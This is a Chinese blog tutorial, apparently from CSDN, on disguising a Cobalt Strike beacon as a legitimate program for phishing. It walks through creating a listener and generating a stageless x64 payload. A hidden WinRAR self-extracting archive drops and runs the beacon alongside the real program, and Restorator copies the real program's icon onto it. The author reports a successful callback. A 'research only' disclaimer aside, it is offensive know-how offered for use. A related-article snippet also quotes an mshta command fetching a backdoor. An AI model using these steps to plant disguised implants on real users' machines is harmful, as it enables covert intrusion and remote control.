伪装马上线Cobalstrike

已于 2022-08-06 17:46:42 修改
阅读量272 收藏 5
点赞数 4
分类专栏: # 渗透测试-CS 社工钓鱼 文章标签: 安全 网络安全 web安全 社会工程学 Cobalstrike
于 2022-08-06 16:16:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61503377/article/details/126196370
版权

本文内容涉及技术原理仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。 因此造成的后果自行承担,与作者无关

准备工作

工具:
WinRAR压缩工具
Restorator

实验流程

  1. 创建listen。
HTTP Hosts:CS服务器ip
HTTP Hosts(Stager):CS服务器IP
HTTP port:CS服务器端口(随便起)

请添加图片描述

  1. 生成windows无阶段马。
    请添加图片描述

  2. 选择刚刚创建好的listen。勾选x64 payload。
    请添加图片描述

  3. 将要伪装的程序和马放在一个目录下。选择两个程序用WinRAR进行压缩。
    选择一个后按着ctrl继续选择另一个
    请添加图片描述

  4. 对压缩选项进行配置。勾选Create SFX archive。
    请添加图片描述

  5. 在Advanced选项点击SFX options进行配置。
    请添加图片描述

  6. 点击General,将目录填写为C:\Users\Public。
    C:\Users\Public目录是windows公共目录,可供用户访问。
    请添加图片描述

  7. 点击Setup选项,第一个填写马文件,第二个填写正常程序。
    请添加图片描述

  8. 点击Modes。勾选最下边的Hide all选项。
    请添加图片描述

  9. 配置完成后,保存退出,在目录下即可看到压缩好的文件。下面我们要对其更改图标。
    请添加图片描述

  10. 使用Restorator工具,将生成的压缩文件和正常文件拖拽进来,在图标的选项里删除马的图标,复制正常软件的图标到马。
    请添加图片描述注意是图标的目录,不是201文件!

完成结果如下:
请添加图片描述

  1. 返回目录找到马,可以看到伪装成功!
    请添加图片描述

  2. 这里我用自己的机器实验,成功上线!
    请添加图片描述

曲折上升
关注
专栏目录
SweetPotato_CS:修改的SweetPotato,使之可以用于CobaltStrike v4.0
03-19
SweetPotato_CS 修改的SweetPotato,使之可以用于CobaltStrike v4.0
CS使用之生成钓鱼网站和生成木进行后渗透操作
jxy158212的博客
08-16 2542
使用CS生成钓鱼网站、生成木进行后渗透操作
CobaltStrike后渗透进阶篇
2401_84466225的博客
06-19 1299
钓鱼攻击主要通过生成的木诱使受害者运行后上线,其中木一般都伪装成正常的程序。与此同时配合钓鱼网站可帮助攻击者模拟真实网站诱骗受害者访问,达到获取账号密码、上线等目的。接下来主要介绍后门程序的生成及钓鱼模块的使用,共包括以下几个层面克隆网站键盘记录克隆网站执行木MSF配合CS钓鱼。
简单使用工具提取cobalt strike
kernweak的博客
10-28 1609
针对hw,很多红队开发人员,都是简单加工了下CS,套了层外壳,针对于这类样本的分析提取CS,可以使用工具快速分析提取CS的beacon,并不要什么太多操作。 首先拿到样本,先常规提取恶意PE文件。使用pe-sieve工具。 https://github.com/hasherezade/pe-sieve 比如提取后这种未命名的就是所在。 如果套了几层,可以关键API下断,手动dump出内存,不过国内hw那些样本大部分都是简单构造。 再判断恶意代码是否为CobaltStrike,比如实例这里,IDA看到
Restorator_2007_Build_1747_CHS个人珍藏
06-22
资源编辑工具,纯属个人收藏,基本补齐允许修改的文件类型在右键菜单打开。
简单易用的后缀伪装.exe
08-02
可将各种文件类型互相伪装
程序伪装
10-15
程序伪装器是一种特殊的软件工具,它的主要功能是改变程序的外观和行为,使其在系统中看起来像另一个程序或服务,以此来规避检测、保护隐私或者实现特定的安全目标。这种技术在网络安全、隐私保护以及恶意软件分析等...
易语言伪装PID
08-22
易语言伪装PID源码系统结构:取进程EProcess,十六文本至长整数_,进程权限提升Debug,内存_写物理内存,内存_读物理内存,取自进程ID,取指针_字节集,RtlMoveMemory3,RtlMoveMemory2,OpenProcess,CloseHandle,
labview加密伪装_加密伪装_
10-02
在标题和描述中提到的"labview加密伪装",指的是在LabVIEW应用中实现代码保护和安全性的技术。这通常涉及到对程序进行加密和混淆,以防止未经授权的访问、复制或反编译。 在LabVIEW中,源代码是以图标和连线的形式...
逆向CS生成的exe
weixin_43781139的博客
03-01 2506
前言 Cobalt Strike(以下简称CS)是红队在渗透攻击中的一款神器,使用稳定,功能全面。本文是对CS生成的exe文件进行分析,看看CS生成的木有什么高明之处。 准备工作 工具准备:Cobalt Strike ida x32dbg exeinfope CS能生成的木有很多种,如下图所示: 这里我不一一介绍,有兴趣的同学自行去研究。我们这里先选择Windows Executable 注: Windows Executable 生成可执行的分段payloa...
免杀制作-教你如何一键制作window-CS上线免杀(新手推荐)
weixin_42109829的博客
10-20 7232
一、免杀思路 应该说每一类型的恶意软件所实施的反检测技术都是不一样的(恶意软件可以分为病毒、木、僵尸程序、流氓软件、勒索软件、广告程序等),虽然本文会对所有相关的反检测技术都进行介绍,但我们还是会将注意力放在stager阶段的meterpreter这种有效载荷的工具上,因为几乎所有的恶意软件的攻击命令的执行都必须依靠 meterpreter来实施攻击,例如: 提权、凭证窃取、进程迁移、注册表操作和分配更多的后续攻击, 另外,MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说
怎么生成木_免杀系列CSshellcode分离免杀上线
weixin_39970668的博客
12-20 3411
10月13日CSshellcode分离免杀上线最近在学习CS怎么去免杀,今天来分享一下吧,反正有手就行呗0x00Article directory [目录结构]0x01 环境介绍0x02 插件部署0x03 改造流程0x04 测试效果0x05总结0x01环境介绍本次免杀所使用的是shellcode分离免杀技术CS版本:4.0语言:Golang插件:项目地址:http://gith...
csWindows上
weixin_45682070的博客
12-15 356
设置监听 生成http application后门 选择powershell脚本 然后把生成的evil.hta文件上传到cs服务器上 这时已经挂在cs服务器/download目录下 如果有命令执行漏洞,执行mshta+刚才生成的路径 mshta http://192.168.17.181:80/download/file.ext 然后就获得一个shell,只适用win ......
看我如何模拟Cobalt Strike上线欺骗入侵者
K8哥哥
03-01 1654
前言 不知道你有没有遇到过上线却不能操作的情况,我猜当你网络卡或写得不好时会出现这个问题 但是人为的你可能没遇到过,首先要欺骗你的远控,得分析你的协议,如果你的根本不是公开的 网络又是好的,你刚往人家机器里种,发现只能上线不能操作,绝对是有问题,不能甩锅我 人家都不知道你的的通信原理,流量特征,不可能事先准备好一个程序,让你一发就欺骗你的 本文主要研究CS这个APT很喜欢用的,当...
时间&安全精细化管理平台存在未授权访问漏洞
2301_77012231的博客
09-14 364
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
2024网络安全人才实战能力白皮书安全测试评估篇
2301_76786857的博客
09-13 819
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计
哦 卷!
09-14 859
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。
对称密码中的密钥是如何实现安全配送的?
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-17 513
密钥配送问题是指在对称密码算法中,加密和解密使用同一个密钥,发送方必须设法将密钥安全地发送给接收方,而不会被第三方窃听者截获。如果密钥被窃取,那么加密的数据也会被破解,因此密钥的安全配送成为对称密码算法的一个关键问题。为了解决这个问题,密码学领域发展出了多种策略和解决方案。通过通信双方事先共享密钥密钥来解决通过密钥分配中心(KDC)来解决通过密钥交换Diffie-Hellman(DH)来解决通过公钥密码来解决。
ROS双线配置与IP分流指南
5. **配置IP伪装(NAT)**:启用IP伪装,允许内网设备共享外网连接。这在`IP` -> `Firewall` -> `NAT`菜单下进行。 6. **设置IP分流策略**:最后,通过`IP` -> `Firewall` -> `Mangle`创建一个新的规则。在`...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

曲折上升

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值